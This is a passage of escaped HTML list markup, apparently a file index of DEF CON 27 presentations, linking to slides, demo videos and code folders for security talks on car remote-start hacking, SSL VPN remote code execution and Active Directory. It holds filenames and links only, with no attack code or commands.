&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding.pdf"&gt;Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding-Extras/DEFCON-27-Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding-armv8.mp4"&gt;Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding-armv8.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding-Extras/DEFCON-27-Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding-english.mp4"&gt;Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding-english.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding-Extras/hash.mp4"&gt;hash.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding-Extras/slash.mp4"&gt;slash.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Hadrien-Barral-The-ABC-of-Next-Gen-Shellcoding-Extras/tick.mp4"&gt;tick.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Attacking-VoiP-Configuration-Interfaces.pdf"&gt;Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Attacking-VoiP-Configuration-Interfaces.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Demo-Video/DEFCON-27-Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Attacking-VoIP-Configuration-Interfaces-Demo-1.mp4"&gt;Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Attacking-VoIP-Configuration-Interfaces-Demo-1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Demo-Video/DEFCON-27-Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Attacking-VoIP-Configuration-Interfaces-Demo-2.mp4"&gt;Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Attacking-VoIP-Configuration-Interfaces-Demo-2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Demo-Video/DEFCON-27-Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Attacking-VoIP-Configuration-Interfaces-Demo-3.mp4"&gt;Huber-and-Roskosch-I-m-on-Your-Phone-Listening-Attacking-VoIP-Configuration-Interfaces-Demo-3.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-All.pdf"&gt;Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-All.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-All-Demo-Extras.zip"&gt;Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-All-Demo-Extras.zip&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-All-Demo-Video/Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-AllAtomBombing.mp4"&gt;Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-AllAtomBombing.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-All-Demo-Video/Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-AllGhostWriting.mp4"&gt;Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-AllGhostWriting.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-All-Demo-Video/Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-AllSetWindowsLongPtr.mp4"&gt;Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-AllSetWindowsLongPtr.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-All-Demo-Video/Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-AllStackBomber.mp4"&gt;Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-AllStackBomber.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-All-Demo-Video/Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-AllnmapMap.mp4"&gt;Itzik-Kotler-Amit-Klein-Gotta-Catch-Them-AllnmapMap.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jack-Baker-Hacking-Web-Assembly-Games.pdf"&gt;Jack-Baker-Hacking-Web-Assembly-Games.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jack-Baker-Hacking-Web-Assembly-Games-Demo-Video/Jack-Baker-Hacking-Web-Assembly-Games-Demo-1.mp4"&gt;Jack-Baker-Hacking-Web-Assembly-Games-Demo-1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jack-Baker-Hacking-Web-Assembly-Games-Demo-Video/Jack-Baker-Hacking-Web-Assembly-Games-Demo-2.mp4"&gt;Jack-Baker-Hacking-Web-Assembly-Games-Demo-2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil.pdf"&gt;Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil-Demo-Video/Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil-Demo-1.mp4"&gt;Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil-Demo-1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil-Demo-Video/Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil-Demo-2.mp4"&gt;Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil-Demo-2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil-Demo-Video/Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil-Demo-3.mp4"&gt;Jayson-Grace-MOSE-Using-Configuration-Management-for-Evil-Demo-3.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jeff-Dileo-Evil-eBPF-In-Depth.pdf"&gt;Jeff-Dileo-Evil-eBPF-In-Depth.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jeff-Dileo-Evil-eBPF-In-Depth-Extras/Jeff-Dileo-Evil-eBPF-In-Depth-DEMO-call.mp4"&gt;Jeff-Dileo-Evil-eBPF-In-Depth-DEMO-call.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jeff-Dileo-Evil-eBPF-In-Depth-Extras/Jeff-Dileo-Evil-eBPF-In-Depth-DEMO-reduce.mp4"&gt;Jeff-Dileo-Evil-eBPF-In-Depth-DEMO-reduce.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jens-Mueller-Re-Whats-up-Johnny-Covert-Content-Attacks-on-Email-End-to-End-Encryption.pdf"&gt;Jens-Mueller-Re-Whats-up-Johnny-Covert-Content-Attacks-on-Email-End-to-End-Encryption.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jens-Mueller-Re-Whats-up-Johnny-Covert-Content-Attacks-Extras/Jens%20Mueller-demo-decryption-oracle.ogv"&gt;Jens Mueller-demo-decryption-oracle.ogv&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jens-Mueller-Re-Whats-up-Johnny-Covert-Content-Attacks-Extras/Jens%20Mueller-demo-signing-oracle.ogv"&gt;Jens Mueller-demo-signing-oracle.ogv&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car.pdf"&gt;Jmaxxz-Your-Car-is-My-Car.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;OpenRemoteStart-master

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Code-6e0e599/OpenRemoteStart-master/images/"&gt;images/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Code-6e0e599/OpenRemoteStart-master/src/"&gt;src/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Code-6e0e599/OpenRemoteStart-master/LICENSE"&gt;LICENSE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Code-6e0e599/OpenRemoteStart-master/README.md"&gt;README.md&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Code-6e0e599/OpenRemoteStart-master/project.properties"&gt;project.properties&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%200%20-%20BenchCarTour.mp4"&gt;Jmaxxz - 0 - BenchCarTour.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%201%20-%20StartingBenchCarRf.mp4"&gt;Jmaxxz - 1 - StartingBenchCarRf.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%2010%20-%20StartImprezaWithoutTransponder.mp4"&gt;Jmaxxz - 10 - StartImprezaWithoutTransponder.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%2011%20-StartMiniWIthoutKey.mp4"&gt;Jmaxxz - 11 -StartMiniWIthoutKey.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%202%20-%20CloneExistingRemote_ShortEdit%20-%20UPDATED%20V2.mp4"&gt;Jmaxxz - 2 - CloneExistingRemote_ShortEdit - UPDATED V2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%202%20-CloneExistingRemote.mp4"&gt;Jmaxxz - 2 -CloneExistingRemote.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%203%20-%20StartCar.mp4"&gt;Jmaxxz - 3 - StartCar.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%204%20-%20DriveOff%20-%20UPDATED%20V2.mp4"&gt;Jmaxxz - 4 - DriveOff - UPDATED V2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%204%20-%20DriveOff.mp4"&gt;Jmaxxz - 4 - DriveOff.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%205%20-%20DisableWheelLockAndDrive.mp4"&gt;Jmaxxz - 5 - DisableWheelLockAndDrive.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%206%20-%20StartCarAfterStop.mp4"&gt;Jmaxxz - 6 - StartCarAfterStop.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jmaxxz-Your-Car-is-My-Car-Demo-Videos/Jmaxxz%20-%209%20-%20SqliStartCar.mp4"&gt;Jmaxxz - 9 - SqliStartCar.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Joshua-Maddux-API-Induced-SSRF.pdf"&gt;Joshua-Maddux-API-Induced-SSRF.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Joshua-Maddux-API-Induced-SSRF-Demo-Video/Joshua%20Maddux%20-%20API-Induced%20SSRF%20-%20Demo%201%20appr-wrapper.mp4"&gt;Joshua Maddux - API-Induced SSRF - Demo 1 appr-wrapper.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Joshua-Maddux-API-Induced-SSRF-Demo-Video/Joshua%20Maddux%20-%20API-Induced%20SSRF%20-%20Demo%202%20webkitorg.mp4"&gt;Joshua Maddux - API-Induced SSRF - Demo 2 webkitorg.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Joshua-Maddux-API-Induced-SSRF-Demo-Video/Joshua%20Maddux%20-%20API-Induced%20SSRF%20-%20Demo%203%20twilio.mp4"&gt;Joshua Maddux - API-Induced SSRF - Demo 3 twilio.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Leon-Jacobs-Meticulously-Modern-Mobile-Manipulations.pdf"&gt;Leon-Jacobs-Meticulously-Modern-Mobile-Manipulations.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Leon-Jacobs-Meticulously-Modern-Mobile-Manipulations-Demo-Video/Leon%20Jacobs%20-%201.%20http-file-browser.mp4"&gt;Leon Jacobs - 1. http-file-browser.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Leon-Jacobs-Meticulously-Modern-Mobile-Manipulations-Demo-Video/Leon%20Jacobs%20-%202.%20heap-ios-tiktok.mp4"&gt;Leon Jacobs - 2. heap-ios-tiktok.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Leon-Jacobs-Meticulously-Modern-Mobile-Manipulations-Demo-Video/Leon%20Jacobs%20-%203.%20reflection-jar-socket.mp4"&gt;Leon Jacobs - 3. reflection-jar-socket.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Leon-Jacobs-Meticulously-Modern-Mobile-Manipulations-Demo-Video/Leon%20Jacobs%20-%204.%20ios-flex-plugin.mp4"&gt;Leon Jacobs - 4. ios-flex-plugin.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Leon-Jacobs-Meticulously-Modern-Mobile-Manipulations-Demo-Video/Leon%20Jacobs%20-%205.%20android-stetho.mp4"&gt;Leon Jacobs - 5. android-stetho.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Leon-Jacobs-Meticulously-Modern-Mobile-Manipulations-Demo-Video/Leon%20Jacobs%20-%206.%20jenkins-ci.mov.mp4"&gt;Leon Jacobs - 6. jenkins-ci.mov.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Maksim-Shudrak-Zero-Bugs-Found-Hold-My-Beer-AFL-How-to-Improve-Coverage-guided-Fuzzing-and-Find-New-Zero-days-in-Tough-Targets.pdf"&gt;Maksim-Shudrak-Zero-Bugs-Found-Hold-My-Beer-AFL-How-to-Improve-Coverage-guided-Fuzzing-and-Find-New-Zero-days-in-Tough-Targets.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Maksim-Shudrak-Zero-Bugs-Found-Hold-My-Beer-Extras/afl_main_screen_fast.mkv"&gt;afl_main_screen_fast.mkv&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Maksim-Shudrak-Zero-Bugs-Found-Hold-My-Beer-Extras/manul_main.mkv"&gt;manul_main.mkv&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Maksim-Shudrak-Zero-Bugs-Found-Hold-My-Beer-Extras/zeek_1.mkv"&gt;zeek_1.mkv&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance.pdf"&gt;Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance-Demo-Video/Nikhil%20-%20RACE%20-%20Minimal%20Rights%20and%20ACE%20for%20Active%20Directory%20Dominance%20-%20Demo2-ModifyServicePermissions.mp4"&gt;Nikhil - RACE - Minimal Rights and ACE for Active Directory Dominance - Demo2-ModifyServicePermissions.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance-Demo-Video/Nikhil%20-%20RACE%20-%20Minimal%20Rights%20and%20ACE%20for%20Active%20Directory%20Dominance%20-%20Demo3-JEAToDC.mp4"&gt;Nikhil - RACE - Minimal Rights and ACE for Active Directory Dominance - Demo3-JEAToDC.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance-Demo-Video/Nikhil%20-%20RACE%20-%20Minimal%20Rights%20and%20ACE%20for%20Active%20Directory%20Dominance%20-%20Demo4-DumpDCHash.mp4"&gt;Nikhil - RACE - Minimal Rights and ACE for Active Directory Dominance - Demo4-DumpDCHash.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance-Demo-Video/Nikhil%20-%20RACE%20-%20Minimal%20Rights%20and%20ACE%20for%20Active%20Directory%20Dominance%20-%20Demo5-CompromiseForestRoot.mp4"&gt;Nikhil - RACE - Minimal Rights and ACE for Active Directory Dominance - Demo5-CompromiseForestRoot.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance-Demo-Video/Nikhil%20-%20RACE%20-%20Minimal%20Rights%20and%20ACE%20for%20Active%20Directory%20Dominance-%20Demo1-PSRemotingToDC.mp4"&gt;Nikhil - RACE - Minimal Rights and ACE for Active Directory Dominance- Demo1-PSRemotingToDC.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Orange-Tsai-and-Meh-Chang-Infiltrating-Corporate-Intranet-Like-NSA-Pre-auth-RCE-on-Leading-SSL-VPNs.pdf"&gt;Orange-Tsai-and-Meh-Chang-Infiltrating-Corporate-Intranet-Like-NSA-Pre-auth-RCE-on-Leading-SSL-VPNs.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Orange-Tsai-and-Meh-Chang-Infiltrating-Corporate-Intranet-Like-NSA-Pre-auth-RCE-on-Leading-SSL-VPNs-Demo-Video.zip"&gt;Orange-Tsai-and-Meh-Chang-Infiltrating-Corporate-Intranet-Like-NSA-Pre-auth-RCE-on-Leading-SSL-VPNs-Demo-Video.zip&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Orange-Tsai-and-Meh-Chang-Infiltrating-Corporate-Intranet-Like-NSA-Pre-auth-RCE-on-Leading-SSL-VPNs-Demo-Video/Orange-Tsai-and-Meh%20Chang-Infiltrating%20Corporate%20Intranet%20Like%20NSA%20-%20Pre-auth%20RCE%20on%20Leading%20SSL%20VPNs-demo_fortigate.mp4"&gt;Orange-Tsai-and-Meh Chang-Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs-demo_fortigate.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Orange-Tsai-and-Meh-Chang-Infiltrating-Corporate-Intranet-Like-NSA-Pre-auth-RCE-on-Leading-SSL-VPNs-Demo-Video/Orange-Tsai-and-Meh%20Chang-Infiltrating%20Corporate%20Intranet%20Like%20NSA%20-%20Pre-auth%20RCE%20on%20Leading%20SSL%20VPNs-demo_pulsesecure_v1.mp4"&gt;Orange-Tsai-and-Meh Chang-Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs-demo_pulsesecure_v1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks.pdf"&gt;Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks-Demo-Video/1_video.mp4"&gt;1_video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks-Demo-Video/2_video.mp4"&gt;2_video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks-Demo-Video/PedroCabrera%20-%20SDR%20Against%20Smart%20TVs_video10-B+M.mp4"&gt;PedroCabrera - SDR Against Smart TVs_video10-B+M.mp4&lt;/a&gt;&lt;/li&gt;
